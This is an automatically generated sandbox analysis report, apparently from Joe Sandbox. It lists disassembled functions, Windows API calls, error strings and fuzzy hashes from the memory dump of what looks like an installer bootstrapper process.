Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CreateErrorFileLast
String ID: fileutil.cpp
API String ID: 1214770103-2967768451
Opcode ID: 7494f91b0caf56cfeb3e69f159127decadecc9aa6a47509dbc4b780604964b4f
Instruction ID: 2c4d78962a192c96df2103f71c9e583aac924c21cc7baa04840895ec93dd0663
Opcode Fuzzy Hash: 7494f91b0caf56cfeb3e69f159127decadecc9aa6a47509dbc4b780604964b4f
Instruction Fuzzy Hash: 5001F232680174B6E72136965C0AF6B2958FB02B70F124221FF59FE1E1C7655D1052E1

Function 008C6BEB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49serviceCOMMON

Download Yara Rule

APIs

ControlService.ADVAPI32(008C6AFD,00000001,?,00000001,00000000,?,?,?,?,?,?,008C6AFD,00000000), ref: 008C6C13
GetLastError.KERNEL32(?,?,?,?,?,?,008C6AFD,00000000), ref: 008C6C1D

Strings

msuuser.cpp, xrefs: 008C6C41
Failed to stop wusa service., xrefs: 008C6C4B

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ControlErrorLastService
String ID: Failed to stop wusa service.$msuuser.cpp
API String ID: 4114567744-2259829683
Opcode ID: 48d728d23049ca172cdf3e380556c6825998e8d0f25ce992dbbaaf2abf173fc5
Instruction ID: b05f028d32d85883ef9932797feb4013af4f602183977ccc05c8108555249566
Opcode Fuzzy Hash: 48d728d23049ca172cdf3e380556c6825998e8d0f25ce992dbbaaf2abf173fc5
Instruction Fuzzy Hash: F101FC33A4523967D7209BA99C45FAB77B4FB08720F010039FE00FB280EA38DC0155E5

Function 008E39AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 008E39F4
SysFreeString.OLEAUT32(00000000), ref: 008E3A27

Strings

xmlutil.cpp, xrefs: 008E39C5, 008E3A0B
`Dv, xrefs: 008E3A27

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: String$AllocFree
String ID: `Dv$xmlutil.cpp
API String ID: 344208780-2876128059
Opcode ID: e6a0d39888a1fdae71826ffab51daadb3362db8b3a16142bb9e42e0e4305dbbd
Instruction ID: a0272369817d277444e305c852d796450223c1b62c2811cf47fb8e7442384222
Opcode Fuzzy Hash: e6a0d39888a1fdae71826ffab51daadb3362db8b3a16142bb9e42e0e4305dbbd
Instruction Fuzzy Hash: A7018F356442A5BBD7205A9A980DE7B36DCFF43764F100039B854EB351C7B4CE4086A1

Function 008E3929 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 008E396E
SysFreeString.OLEAUT32(00000000), ref: 008E39A1

Strings

xmlutil.cpp, xrefs: 008E393F, 008E3985
`Dv, xrefs: 008E39A1

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: String$AllocFree
String ID: `Dv$xmlutil.cpp
API String ID: 344208780-2876128059
Opcode ID: 14caeeddd97ba0786d8f7cce289fbbe104d799cc8e8434ec6f06034934d66511
Instruction ID: 4a1ce5b7b1aae98c2eb8e40c27c35fd0450bb50b8b0df48261f659b512448fda
Opcode Fuzzy Hash: 14caeeddd97ba0786d8f7cce289fbbe104d799cc8e8434ec6f06034934d66511
Instruction Fuzzy Hash: 2901A231244299ABD7202A9A8C09E7B3ADCFF43B64F100539FD54EB342C7B4CE0096A1

Function 008E68B0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 008E690F

Part of subcall function 008E8713: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 008E8820
Part of subcall function 008E8713: GetLastError.KERNEL32 ref: 008E882A

Strings

clbcatq.dll, xrefs: 008E68DC
atomutil.cpp, xrefs: 008E68FD
`Dv, xrefs: 008E690F

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Time$ErrorFileFreeLastStringSystem
String ID: `Dv$atomutil.cpp$clbcatq.dll
API String ID: 211557998-305513856
Opcode ID: 609416da9b7484a1478aa6c81fcab628250c5045e6ff71f0681470d17a30be15
Instruction ID: 13b548a423d43b11d2b72b9ed2cd3b863db7b900b8a22abdad54248dfcd08400
Opcode Fuzzy Hash: 609416da9b7484a1478aa6c81fcab628250c5045e6ff71f0681470d17a30be15
Instruction Fuzzy Hash: 5901A7B190516AFB8B206F86C84186AFFA8FB263A4B604179F514E7111E3315E20D7D0

Function 008BECC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 008BECED
GetLastError.KERNEL32 ref: 008BECF7

Strings

userForApplication.cpp, xrefs: 008BED1B
Failed to post elevate message., xrefs: 008BED25

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post elevate message.
API String ID: 2609174426-4098423239
Opcode ID: 70526d1f0103c28f556c4e13cd1cbf4c50f6d6ce7d25a8bb71f176651e20e5fb
Instruction ID: 3e221b1c0f3b9d8909b09c75e2ae34516a418594833da4f3a97894751495e143
Opcode Fuzzy Hash: 70526d1f0103c28f556c4e13cd1cbf4c50f6d6ce7d25a8bb71f176651e20e5fb
Instruction Fuzzy Hash: 81F0C233A80235ABD7205A9C9C09AD77B84FF00B30B254228FE24EF391D7A9DC0186D5

Function 008AD8DC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 008AD903
FreeLibrary.KERNEL32(?,?,008A48D7,00000000,?,?,008A548E,?,?), ref: 008AD912
GetLastError.KERNEL32(?,008A48D7,00000000,?,?,008A548E,?,?), ref: 008AD91C

Strings

BootstrapperApplicationDestroy, xrefs: 008AD8FB

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AddressErrorFreeLastLibraryProc
String ID: BootstrapperApplicationDestroy
API String ID: 1144718084-3186005537
Opcode ID: b5c11554fa981af97ffe74312d0ef4c59ce1084ef42c277fe05a28be8f79b0bf
Instruction ID: d1becbea2789702b0ae8224b610625acd08a42476c0d9794aedeafd4ff2c6907
Opcode Fuzzy Hash: b5c11554fa981af97ffe74312d0ef4c59ce1084ef42c277fe05a28be8f79b0bf
Instruction Fuzzy Hash: 0FF06832600726ABD7214F75D804B27FBA4FF057627058229E825D6D21D765EC108BD0

Function 008E31EB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 008E3200
SysFreeString.OLEAUT32(00000000), ref: 008E3230

Strings

xmlutil.cpp, xrefs: 008E3214
`Dv, xrefs: 008E3230

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: String$AllocFree
String ID: `Dv$xmlutil.cpp
API String ID: 344208780-2876128059
Opcode ID: 577103cc8a525fc08efb3c8dfdda32cf90aab0275937cbe8620914eff4ee6fe2
Instruction ID: 53c3cee60e120c5a834ad0e0511061b0d3959e10c0fcd491869475415e5f2a9c
Opcode Fuzzy Hash: 577103cc8a525fc08efb3c8dfdda32cf90aab0275937cbe8620914eff4ee6fe2
Instruction Fuzzy Hash: CDF0BE311016D9ABC7310F859C0CF6B77E8FB82B62F254029FD58AB210C7758E1096E1

Function 008E3498 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 008E34AD
SysFreeString.OLEAUT32(00000000), ref: 008E34DD

Strings

xmlutil.cpp, xrefs: 008E34C4
`Dv, xrefs: 008E34DD

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: String$AllocFree
String ID: `Dv$xmlutil.cpp
API String ID: 344208780-2876128059
Opcode ID: 4904c3c2719248c4f22d8c0f7033b777470f0b58f290c62f2706405bf3a43b37
Instruction ID: dac2e4f8e159393d57420fd1c709c01342613e264800cb76d1a5971277c347bc
Opcode Fuzzy Hash: 4904c3c2719248c4f22d8c0f7033b777470f0b58f290c62f2706405bf3a43b37
Instruction Fuzzy Hash: 87F0B431241298ABC7331E469C0CE6B77E8FB92B69F10412AFC14DF290C775DE5096E5

Function 008BF2D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 008BF2EE
GetLastError.KERNEL32 ref: 008BF2F8

Strings

Failed to post plan message., xrefs: 008BF326
userForApplication.cpp, xrefs: 008BF31C

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post plan message.
API String ID: 2609174426-2952114608
Opcode ID: a04271f2f8adfd017f2bb45052a628d49eefbebe010fd4695e329adec5e45d48
Instruction ID: 48ec2537005567125004476fed5ef242a8e0f4df0667377722771d64bacd28f7
Opcode Fuzzy Hash: a04271f2f8adfd017f2bb45052a628d49eefbebe010fd4695e329adec5e45d48
Instruction Fuzzy Hash: B0F082336412356BD62126AAAC0AA8B7FC4FF09B70F014021BF54EF392D665980085E5

Function 008BF3E7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009005,?,00000000), ref: 008BF3FC
GetLastError.KERNEL32 ref: 008BF406

Strings

userForApplication.cpp, xrefs: 008BF42A
Failed to post shutdown message., xrefs: 008BF434

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post shutdown message.
API String ID: 2609174426-188808143
Opcode ID: 97bcf492d90030fd8eec6cf269c32cff3226aeb06627662281e117b9942515e8
Instruction ID: 2dd9b4db41f877df82f957c3852093e3497ef42c782c8c855218c142fd8b6c5e
Opcode Fuzzy Hash: 97bcf492d90030fd8eec6cf269c32cff3226aeb06627662281e117b9942515e8
Instruction Fuzzy Hash: C7F0A73364163667D73116A96C0AE9B7B94FF05B70B014031BF14FF392E6549C0086E5

Function 008C07B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(008EB478,00000000,?,008C1717,?,00000000,?,008AC287,?,008A5405,?,008B75A5,?,?,008A5405,?), ref: 008C07BF
GetLastError.KERNEL32(?,008C1717,?,00000000,?,008AC287,?,008A5405,?,008B75A5,?,?,008A5405,?,008A5445,00000001), ref: 008C07C9

Strings

cabextract.cpp, xrefs: 008C07ED
Failed to set begin operation event., xrefs: 008C07F7

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorEventLast
String ID: Failed to set begin operation event.$cabextract.cpp
API String ID: 3848097054-4159625223
Opcode ID: 487dbde09f4bf5b2d29147e38b1f09df1d5beb996bcfbcc275e07bd15ec7a6e3
Instruction ID: 0b383def06c298e8ee1c08055398cb5837358b583ef1a276224b61a82890783c
Opcode Fuzzy Hash: 487dbde09f4bf5b2d29147e38b1f09df1d5beb996bcfbcc275e07bd15ec7a6e3
Instruction Fuzzy Hash: 9EF02733642635A7862412A95C09F8B76A8FE01BB0B110039FF14FB240E628EC00CAE6

Function 008BEBCB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 008BEBE0
GetLastError.KERNEL32 ref: 008BEBEA

Strings

Failed to post apply message., xrefs: 008BEC18
userForApplication.cpp, xrefs: 008BEC0E

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post apply message.
API String ID: 2609174426-1304321051
Opcode ID: 4a80c0f0f8a85f602c4c5724b9e8522fb7cef1f15ee4984726a5ea87911c9d85
Instruction ID: 5b0ab49104afdf46f67d27dfbfb9e8786c3a0dd1f62b2d4238671fac5cbe1e68
Opcode Fuzzy Hash: 4a80c0f0f8a85f602c4c5724b9e8522fb7cef1f15ee4984726a5ea87911c9d85
Instruction Fuzzy Hash: 15F0A733A512356BD63116A99C0DECBBF84FF05B70B024020FE18FE391D6649C0086E5

Function 008BEC5C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 008BEC71
GetLastError.KERNEL32 ref: 008BEC7B

Strings

Failed to post detect message., xrefs: 008BECA9
userForApplication.cpp, xrefs: 008BEC9F

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post detect message.
API String ID: 2609174426-598219917
Opcode ID: 755d34dc80337f342d2265641d030bcc2ec49f304a8b0d9bcf5a012378cb2bb8
Instruction ID: 5020a3695da341b38a476db66cfd989b01db3dbe73407af74569d184b6884862
Opcode Fuzzy Hash: 755d34dc80337f342d2265641d030bcc2ec49f304a8b0d9bcf5a012378cb2bb8
Instruction Fuzzy Hash: 60F0A737651635ABD73156AAAC09FC7BF94FF04B71B024021BE58FE391E6649C00C5E5

Function 008D6B76 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 008D6C01
__alldvrm.LIBCMT ref: 008D6E02
__alldvrm.LIBCMT ref: 008D6E24

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
Instruction ID: 3811a3e064fb061b4b5c14c582a1b1ea9469cc46fb8c0473450095211fae6b65
Opcode Fuzzy Hash: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
Instruction Fuzzy Hash: 34A14675A0038E9FDB21CF28C8817AEBBA5FF15310F24426FE585DB381E6399951C751

Function 008E5EC5 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 163stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 008E5F92
lstrlenW.KERNEL32(00000000), ref: 008E5FAA

Strings

dlutil.cpp, xrefs: 008E6033

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: lstrlen
String ID: dlutil.cpp
API String ID: 1659193697-2067379296
Opcode ID: f60dbc3e266b181409dac12d018ee8d73b8a757ad692e24c22e2abdc5a9d7d30
Instruction ID: 3b5a1e453630983dfdae62c2fd9e75d853c88e455fb10d15e7e2490b4b7cad8f
Opcode Fuzzy Hash: f60dbc3e266b181409dac12d018ee8d73b8a757ad692e24c22e2abdc5a9d7d30
Instruction Fuzzy Hash: 5C51B072A0166AAFDB219FA68C809AFBBB9FF89750F154014F900F7250DB31DD519BA0

Function 008D922B Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,ECE85006,008D2444,00000000,00000000,008D3479,?,008D3479,?,00000001,008D2444,ECE85006,00000001,008D3479,008D3479), ref: 008D9278
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008D9301
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 008D9313
__freea.LIBCMT ref: 008D931C

Part of subcall function 008D521A: HeapAlloc.KERNEL32(00000000,?,?,?,008D1F87,?,0000015D,?,?,?,?,008D33E0,000000FF,00000000,?,?), ref: 008D524C

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__freea
String ID:
API String ID: 573072132-0
Opcode ID: 8000158bed2fc8a9a6dd10fe7b4daf433227248b7f0bd15ecdb1f96d245f2cec
Instruction ID: a9258b4b65605631506064ae5925982510098fa030cfe51495d2e9348744c82c
Opcode Fuzzy Hash: 8000158bed2fc8a9a6dd10fe7b4daf433227248b7f0bd15ecdb1f96d245f2cec
Instruction Fuzzy Hash: 2731B032A0020AABDF299F68CC85EAE7BA5FF40310F04022AFC54D7291E735CD51CB90

Function 008A4FA4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00000000,?,008A5552,?,?,?,?,?,?), ref: 008A4FFE
DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,008A5552,?,?,?,?,?,?), ref: 008A5012
TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,008A5552,?,?), ref: 008A5101
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,008A5552,?,?), ref: 008A5108

Part of subcall function 008A1161: LocalFree.KERNEL32(?,?,008A4FBB,?,00000000,?,008A5552,?,?,?,?,?,?), ref: 008A116B

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalDeleteFreeSection$CloseHandleLocal
String ID:
API String ID: 3671900028-0
Opcode ID: e8005366e350500d3800f5602bd2474c5b8f2fabe6dd18c26e005c9f8d63f2f2
Instruction ID: 853084280b617d63d6e0ff82094faa014783791c0b216a74a24cc8acbae6d0fb
Opcode Fuzzy Hash: e8005366e350500d3800f5602bd2474c5b8f2fabe6dd18c26e005c9f8d63f2f2
Instruction Fuzzy Hash: 3F41DD71500B459BEA30EBB9C889F9B73ECFF06350F440C29B69AD3451EB34E5458B66

Function 008A4C86 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 008AF96C: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,008A4CA5,?,?,00000001), ref: 008AF9BC

CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 008A4D0C

Strings

Failed to re-launch bundle process after RunOnce: %ls, xrefs: 008A4CF6
Unable to get resume command line from the registry, xrefs: 008A4CAB
Failed to get current process path., xrefs: 008A4CCA

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Close$Handle
String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
API String ID: 187904097-642631345
Opcode ID: 294fab0769afd414e38838a92456627bbef8c2a3cb70033d3c11387b039d952d
Instruction ID: 9af252febbec982652211bc12c4276366a378a6d90bcf6f279f4a8f7122726f9
Opcode Fuzzy Hash: 294fab0769afd414e38838a92456627bbef8c2a3cb70033d3c11387b039d952d
Instruction Fuzzy Hash: 5A118131D01559BBDF22AB9ADC018AEBBB8FF92710B104196F910F6611DBB58F50DF81

